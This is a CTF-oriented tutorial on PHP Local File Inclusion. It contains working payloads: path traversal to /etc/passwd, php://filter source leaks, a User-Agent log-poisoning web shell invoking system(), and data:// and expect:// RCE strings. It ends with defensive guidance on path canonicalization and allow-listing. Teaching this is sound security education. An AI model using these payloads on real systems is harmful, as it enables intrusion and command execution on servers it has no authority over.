LFI for CTF: From /etc/passwd to RCE

Introduction

The first time someone showed me a ?file=about parameter and asked what I'd try, I had nothing. I knew the word LFI. I'd skimmed a writeup. I just couldn't picture how it worked, or why every guide I opened gave me a different "top five payloads" list with no through-line connecting them.

Here's the through-line. In PHP, where most Local File Inclusion (LFI) lives, include('pages/' . $_GET['file'] . '.php') doesn't sanitize anything. It hands the string to PHP's streams layer, which knows about local files, network protocols, base64 encoding, and a dozen other things you wouldn't expect a file function to know about. Every "LFI payload" you've memorized is the same question with different verbs: what URL scheme will include() happily eat today?

That framing is PHP-shaped. LFI also lives in Java's FileSystemResource, Python's naive os.path.join, and Node's path.resolve. Outside PHP the question shifts: will the framework canonicalize my path before it trusts it? Same trust failure, different machinery. I'll stay in PHP for the rest of this piece because that's where the four-move escalation lives, but the mental model travels.

If you can't tell whether a ?file= parameter is exploitable in sixty seconds, you're leaving the easy half of web-exploitation challenges on the table.

The bug is misplaced trust

PHP's file functions go through what the manual calls the streams layer. A "wrapper" is the code that teaches the streams layer how to talk to a specific protocol or encoding. The list of bundled wrappers, from the Supported Protocols and Wrappers page, covers file://, http://, ftp://, php:// (with half a dozen sub-wrappers), data://, phar://, expect://, and a handful of compression wrappers.

The PHP manual for include() says it directly: "If URL include wrappers are enabled in PHP, you can specify the file to be included using a URL (via HTTP or other supported wrapper [...]) instead of a local pathname." (php.net) That sentence is the whole bug. include() was built before "user-controlled filename" was recognized as a category of attack, so the function trusts you to pass it something reasonable. The wrappers turn that trust into a parts catalog.

Move 1: Read the file the server didn't mean to show

The first move is the dumb one. Path traversal.

GET /?file=../../../../etc/passwd

On a vulnerable PHP app, the argument to include('pages/' . $_GET['file'] . '.php') becomes pages/../../../../etc/passwd.php. The kernel resolves the ../ segments and, given enough of them to reach the root, goes looking for /etc/passwd.php. That file doesn't exist, because there's a trailing .php glued on the end.

This is where every beginner stalls. Older PHP versions let you bolt a null byte onto the end (?file=../../../etc/passwd%00) so the kernel saw the path stop early. The PHP 5.3.4 changelog killed that trick in 2010 ("paths with NULL in them are now considered invalid"), so on a modern stack the null byte does nothing. What saves you is finding code that doesn't append a suffix. include($_GET['page']) instead of include($_GET['page'] . '.php') happens more often than it should, and when it does, Move 1 is the entire exploit.
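To make the suffix problem concrete, here is a minimal Python sketch that mimics the string concatenation and then normalizes the result. The docroot /var/www/html and the helper name resolve_include are assumptions for illustration, and normpath only collapses ../ lexically; a real kernel lookup would also follow symlinks.

```python
import posixpath

def resolve_include(user_input, suffix=".php", docroot="/var/www/html", prefix="pages/"):
    """Mimic include(prefix . input . suffix) and normalize the path lexically."""
    # PHP builds the full string first; the filesystem only ever sees the result.
    relative = prefix + user_input + suffix
    # normpath collapses ../ segments (it does not follow symlinks).
    return posixpath.normpath(posixpath.join(docroot, relative))

# Suffix appended: the traversal succeeds but points at a file that does not exist.
print(resolve_include("../../../../etc/passwd"))             # /etc/passwd.php
# No suffix appended: the same input resolves to the real target.
print(resolve_include("../../../../etc/passwd", suffix=""))  # /etc/passwd
```

Extra ../ segments are harmless, because normalization stops at the root. That is why payloads tend to over-shoot rather than count directories.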

The canonical picoCTF example is Forbidden Paths. The challenge app joins /usr/share/nginx/html/ to your input and serves whatever opens. ../../../../flag.txt walks back to / and returns the flag. Try %2e%2e%2f if the literal .. is filtered. Try doubling the encoding (%252e%252e%252f) if a middlebox decodes once before the app sees the string.
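The two encodings above are easy to get wrong by hand. The sketch below, with hypothetical helper names, builds both forms and checks that they decode back in the expected number of passes. It encodes every byte manually because urllib's quote() leaves the '.' character alone.

```python
from urllib.parse import unquote

def percent_encode_all(text):
    """Percent-encode every byte, including '.', which quote() would skip."""
    return "".join(f"%{byte:02x}" for byte in text.encode("utf-8"))

def double_encode(text):
    """Encode once, then encode the '%' signs so one decoding pass leaves %2e%2e%2f."""
    return percent_encode_all(text).replace("%", "%25")

traversal = "../"
single = percent_encode_all(traversal)
double = double_encode(traversal)

print(single)  # %2e%2e%2f
print(double)  # %252e%252e%252f

# One decoding pass turns the double-encoded form into the single-encoded form,
# and a second pass yields the raw traversal.
print(unquote(double) == single, unquote(single) == traversal)
```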

One more thing. If /etc/passwd renders as a blank page, view the raw HTML source. Plenty of vulnerable apps wrap the include inside a <title> tag or a CSS block, and the file contents are sitting there in the response, invisible until you stop trusting the browser to render them.

Move 2: php://filter leaks the source

Move 1 can't read PHP source. The instant include() opens /var/www/index.php, the parser runs the code and hands you the output, not the source. Annoying, because the source is where the next vulnerability usually lives.

So you stop asking "what file?" and start asking "what wrapper?"

GET /?file=php://filter/convert.base64-encode/resource=index.php

That returns the base64 of index.php. The filter sits between include() and the file read, passes every byte through base64 encoding, and the encoded bytes become the "file contents" the parser sees. Base64 output never contains a <?php opening tag, so the parser finds no code to run, treats the whole string as literal text, and echoes it into the response body. Decode it and you get the source. One condition: your input has to start the string passed to include(), because a hard-coded prefix like pages/ turns the wrapper into an ordinary relative path.
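The leaked base64 usually arrives embedded in the page template, so a small decoder saves time. This is a sketch under stated assumptions: the response body below is simulated, extract_source is a hypothetical helper, and picking the longest valid base64 run is a heuristic that can misfire on pages carrying other long encoded blobs.

```python
import base64
import re

def extract_source(body, min_len=20):
    """Return the decoded text of the longest valid base64 run in a response body."""
    runs = re.findall(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, body)
    for run in sorted(runs, key=len, reverse=True):
        try:
            return base64.b64decode(run, validate=True).decode("utf-8", errors="replace")
        except ValueError:  # binascii.Error is a subclass of ValueError
            continue
    raise ValueError("no decodable base64 run found")

# Simulated response: a made-up page template wrapped around the encoded source.
php_source = "<?php include($_GET['page']); ?>"
encoded = base64.b64encode(php_source.encode("utf-8")).decode("ascii")
body = "<html><body><h1>Site</h1>" + encoded + "</body></html>"

# The base64 alphabet has no '<', so the encoded text cannot contain a PHP open tag.
print("<?" in encoded)       # False
print(extract_source(body))  # <?php include($_GET['page']); ?>
```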

There's a research vein on top of this called filter-chain remote code execution (RCE). Filters can do more than base64; they can also do character-set conversions via iconv, and iconv is a near-arbitrary byte transformer if you stack enough conversions in sequence. A player named loknop demonstrated at hxp CTF 2021 (a major German CTF) that the right chain (convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|...) lets you construct arbitrary PHP bytes through include() without uploading a single file. Synacktiv (a French offensive-security firm) generalized the trick in 2022 with a payload generator, and Charles Fol followed in 2024 with CVE-2024-2961, a buffer overflow in glibc's iconv() that he reached through the same filter conversions. You don't need to know how those work today. You need to know that the technique still pops modern PHP, and the parts catalog is the wrappers manual.

Move 3: Log poisoning (and the /proc/self/environ ghost)

Move 3 is the trick every guide teaches. It's also the trick that doesn't work on a default modern box. Worth knowing because the technique outlives the configuration that killed it.

The idea: get the server to write your attacker-controlled string into a file you're allowed to include, then include that file as PHP. Apache logs the User-Agent of every request, and curl -A sets the User-Agent header for you. So:

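# Step 1: poison the log via the User-Agent header.
# Use single quotes inside the PHP: Apache backslash-escapes double quotes
# in logged headers, which would turn $_GET["c"] into a parse error.
curl -A "<?php system(\$_GET['c']); ?>" http://target/

# Step 2: include the log and pass a command
GET /?file=../../../var/log/apache2/access.log&c=id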

The server logs your payload, then includes the log, then runs the PHP it finds in your User-Agent. You get the output of id as www-data. Game over.
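One detail decides whether the logged payload is still valid PHP: Apache's mod_log_config escapes double quotes and backslashes in logged header values by prefixing a backslash. The sketch below is a simplified model of only that rule. The function name is hypothetical, and the \xhh escaping of non-printable bytes is ignored. It shows why payloads written with single quotes survive the trip into the log.

```python
def apache_log_escape(header_value):
    """Simplified model: prefix '"' and '\\' with a backslash, as the access log does."""
    return "".join("\\" + ch if ch in '"\\' else ch for ch in header_value)

double_quoted = '<?php system($_GET["c"]); ?>'
single_quoted = "<?php system($_GET['c']); ?>"

# Double quotes come out as \" in the log, which PHP rejects as a syntax error.
print(apache_log_escape(double_quoted))
# Single quotes pass through untouched, so the logged payload still parses.
print(apache_log_escape(single_quoted))
```

A broken payload is worse than no payload: once a parse error sits in the log, every later include of that file fails at the same spot until the log rotates.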

Here's the catch. On Ubuntu 22.04 and 24.04, /var/log/apache2/access.log is owned root:adm with mode 640, and www-data is not in the adm group. The PHP process can't read the log. You get permission-denied silently and nothing happens. The trick is alive on misconfigured boxes, custom Docker images with permissive log perms, training labs, and CTF challenges that deliberately set it up. On a vanilla install today, it's dead.
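The permission logic behind that catch can be sketched in a few lines. This models only the classic owner/group/other read bits; it ignores ACLs, capabilities, and the execute bit needed on each parent directory. The numeric IDs are the conventional Debian/Ubuntu values and are assumptions here.

```python
def can_read(mode, file_uid, file_gid, proc_uid, proc_gids):
    """Classic Unix read check: owner bits, else group bits, else other bits."""
    if proc_uid == 0:
        return True  # root bypasses the mode bits
    if proc_uid == file_uid:
        return bool(mode & 0o400)
    if file_gid in proc_gids:
        return bool(mode & 0o040)
    return bool(mode & 0o004)

# Conventional Debian/Ubuntu IDs (assumed): root=0, group adm=4, www-data=33.
ROOT_UID, ADM_GID, WWW_DATA = 0, 4, 33

# Default layout: root:adm, mode 640, www-data not in adm.
print(can_read(0o640, ROOT_UID, ADM_GID, WWW_DATA, {WWW_DATA}))           # False
# Misconfigured box: www-data was added to the adm group.
print(can_read(0o640, ROOT_UID, ADM_GID, WWW_DATA, {WWW_DATA, ADM_GID}))  # True
# Permissive Docker image: the log is world-readable.
print(can_read(0o644, ROOT_UID, ADM_GID, WWW_DATA, {WWW_DATA}))           # True
```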

The same idea used to power /proc/self/environ as a sink: inject PHP into the User-Agent header, then ?file=/proc/self/environ. That trick depended on PHP running as a classic CGI process, where the web server hands each request's headers to PHP as real environment variables (HTTP_USER_AGENT among them). It died as LAMP stacks moved to mod_php (the old Apache module that ran PHP in-process) and then to PHP-FPM (the FastCGI process manager that handles PHP requests in dedicated worker pools today). FPM receives request headers over the FastCGI connection and exposes them in $_SERVER; they never reach the worker's Linux environ. The file is still readable. It just doesn't have your payload in it.

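Learn both. Don't expect either. A read primitive can't run ls -la /var/log/apache2/ for you, so test the perms the cheap way: try to include the log with Move 1 first. If no log lines come back, the PHP process can't read the file and there's no point poisoning anything.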

Move 4: data:// and expect:// (when the sysadmin slipped)

Move 4 is the museum exhibit, and you should still try it. It costs you one request.

If allow_url_include was flipped to On:

GET /?file=data:text/plain,<?php system('id'); ?>
GET /?file=expect://id

data:// inlines the PHP source straight into the URL. expect:// runs the command directly, but only if the operator installed the PECL Expect extension (PECL is PHP's optional-extensions repository), which almost no one does outside of intentionally-vulnerable training builds.
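Raw PHP in a query string tends to get mangled by spaces, quotes, and angle brackets, so the data:// payload is often sent in its base64 form instead. A minimal sketch, assuming the documented data://text/plain;base64, syntax; build_data_uri is a hypothetical helper name.

```python
import base64
from urllib.parse import quote, unquote

def build_data_uri(php_source):
    """Wrap PHP source in a base64 data:// URI that is safe to place in a query string."""
    encoded = base64.b64encode(php_source.encode("utf-8")).decode("ascii")
    # '+', '/' and '=' have special meaning in URLs, so percent-encode them.
    return "data://text/plain;base64," + quote(encoded, safe="")

payload = build_data_uri("<?php system('id'); ?>")
print("/?file=" + payload)

# Round-trip check: what the server would decode matches what was sent.
decoded = base64.b64decode(unquote(payload.split(",", 1)[1])).decode("utf-8")
print(decoded)  # <?php system('id'); ?>
```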

Where you'll actually hit this in the wild: legacy LAMP boxes where someone flipped the toggle for an old dependency, bad shared hosting that exposes the setting through a customer-editable php.ini, and CTF challenges that set allow_url_include=On as the implicit hint. Try it after Move 2 fails and before you walk away.

The pattern behind every LFI

Here are all four moves side by side.

Move	Needs allow_url_include?	What you get	Works on default 2026 stack?
../../etc/passwd	No	File contents	Yes
php://filter	No	PHP source as base64; full RCE via filter chain	Yes
log poisoning	No	RCE as www-data	Only if log perms are loose
data://, expect://	Yes	Inline-source RCE	No, almost never

The pattern lives in the PHP docs, which is the frustrating part. The Supported Protocols and Wrappers page is a parts catalog. Most guides treat each wrapper as a distinct trick to memorize, when they're one design choice (file functions go through the streams layer, anyone can plug a new scheme in via stream_wrapper_register) explored through different schemes.

Outside PHP, the question changes. Java's 2024 Spring path-traversal CVEs (CVE-2024-38816) aren't about URL schemes; they're about FileSystemResource not canonicalizing before it trusts. Python LFI lives in naive os.path.join without a startswith(base) check on the resolved path. The defense is the same in every language, and PortSwigger spells it out: canonicalize the resolved path, verify it starts with the base directory you meant, and allow-list the filename component. Don't sanitize by stripping .. sequences. Attackers double-encode.
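That three-step defense can be sketched in Python as follows. The base directory, the allow-list contents, and both function names are hypothetical. The sketch uses os.path.commonpath instead of a raw string-prefix test so that a sibling directory such as /srv/app/pages_backup is not mistaken for the base.

```python
import os

ALLOWED_PAGES = {"about", "contact", "home"}  # hypothetical allow-list

def is_inside(base_dir, user_path):
    """Canonicalize first, then check the result still lives under base_dir."""
    base = os.path.realpath(base_dir)
    # os.path.join discards base when user_path is absolute, so check after joining.
    candidate = os.path.realpath(os.path.join(base, user_path))
    return os.path.commonpath([base, candidate]) == base

def safe_page_path(base_dir, page):
    """Allow-list the name, then verify containment as defense in depth."""
    if page not in ALLOWED_PAGES:
        raise ValueError("page not on the allow-list")
    if not is_inside(base_dir, page + ".php"):
        raise ValueError("resolved path escapes the base directory")
    return os.path.realpath(os.path.join(base_dir, page + ".php"))

print(is_inside("/srv/app/pages", "about.php"))         # True
print(is_inside("/srv/app/pages", "../../etc/passwd"))  # False
print(is_inside("/srv/app/pages", "/etc/passwd"))       # False
```

The allow-list alone would stop every payload in this article. The containment check is there for the day someone adds a name to the list without thinking about what it resolves to.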

The next time you see a ?file= parameter, don't reach for a wordlist. Open the PHP wrappers manual and ask what scheme the parser will eat.

Related picoCTF writeups

Forbidden Paths, Notepad, SOAP, Super Serial
